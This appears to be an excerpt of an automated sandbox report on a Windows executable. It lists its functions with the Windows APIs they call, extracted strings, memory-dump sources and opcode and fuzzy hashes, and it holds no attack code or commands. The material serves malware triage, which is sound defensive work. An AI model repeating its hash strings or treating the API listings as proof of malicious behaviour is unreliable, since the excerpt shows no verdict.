                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                      • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                      • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                      • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                      Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • CoInitialize.OLE32 ref: 00478403
                      • CoUninitialize.OLE32 ref: 0047840E
                      • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                      • IIDFromString.OLE32(?,?), ref: 004784E1
                      • VariantInit.OLEAUT32(?), ref: 0047857B
                      • VariantClear.OLEAUT32(?), ref: 004785DC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 834269672-1287834457
                      • Opcode ID: c6f8ca96ce36d867b95c5300b034a7c5a4be955f287127c01fb95931614cda58
                      • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                      • Opcode Fuzzy Hash: c6f8ca96ce36d867b95c5300b034a7c5a4be955f287127c01fb95931614cda58
                      • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                      Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                      • GetLastError.KERNEL32 ref: 0046B550
                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                      • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                      • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                      • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                      Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                      • GetDlgCtrlID.USER32 ref: 0045901F
                      • GetParent.USER32 ref: 0045903B
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                      • GetDlgCtrlID.USER32(?), ref: 00459047
                      • GetParent.USER32(?), ref: 00459063
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1536045017-1403004172
                      • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                      • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                      • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                      • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                      Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                      • GetDlgCtrlID.USER32 ref: 00459108
                      • GetParent.USER32 ref: 00459124
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                      • GetDlgCtrlID.USER32(?), ref: 00459130
                      • GetParent.USER32(?), ref: 0045914C
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1536045017-1403004172
                      • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                      • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                      • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                      • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                      Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32 ref: 0045916F
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                      • _wcscmp.LIBCMT ref: 00459196
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassMessageNameParentSend_wcscmp
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 1704125052-3381328864
                      • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                      • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                      • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                      • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                      Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 004611F0
                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                      • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                      • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                      • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                      • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                      Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$_memset
                      • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                      • API String ID: 2862541840-2080382077
                      • Opcode ID: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                      • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                      • Opcode Fuzzy Hash: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                      • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                      Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                      Download Yara Rule
                      APIs
                      • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ChildEnumWindows
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 3555792229-1603158881
                      • Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                      • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                      • Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                      • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                      Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                      Download Yara Rule
                      APIs
                      • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                        • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                        • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                        • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                      • GetDC.USER32 ref: 0043CD32
                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                      • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                      • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                      • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                      • String ID: U
                      • API String ID: 4009187628-3372436214
                      • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                      • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                      • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                      • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                      Function 02F91A1B Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                      Download Yara Rule
                      APIs
                      • RtlDecodePointer.NTDLL(00000000), ref: 02F91A3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 100196affc390a6d210aea518a44feac5958c0934f4816967fa2b2012c1043ba
                      • Instruction ID: 0ad4e33fa20d54d5584974de7997626a41d5cda558283196e4ed5a367a089a0c
                      • Opcode Fuzzy Hash: 100196affc390a6d210aea518a44feac5958c0934f4816967fa2b2012c1043ba
                      • Instruction Fuzzy Hash: 48515AB1E0450BCBFF149F68EA481EFBBB1FF49394F1001E5D689A6254DB318928CB64
                      Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                      • SysFreeString.OLEAUT32(?), ref: 00478F00
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                      • String ID:
                      • API String ID: 560350794-0
                      • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                      • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                      • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                      • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                      Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                        • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                        • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                      • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                      • _wcscmp.LIBCMT ref: 00464D5A
                      • MoveFileW.KERNEL32(?,?), ref: 00464D75
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                      • String ID:
                      • API String ID: 793581249-0
                      • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                      • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                      • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                      • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                      Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                      Download Yara Rule
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                      • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                      • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                      • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                      Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                      • DestroyIcon.USER32(00000000), ref: 0043C37F
                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                      • DestroyIcon.USER32(?), ref: 0043C3AB
                        • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
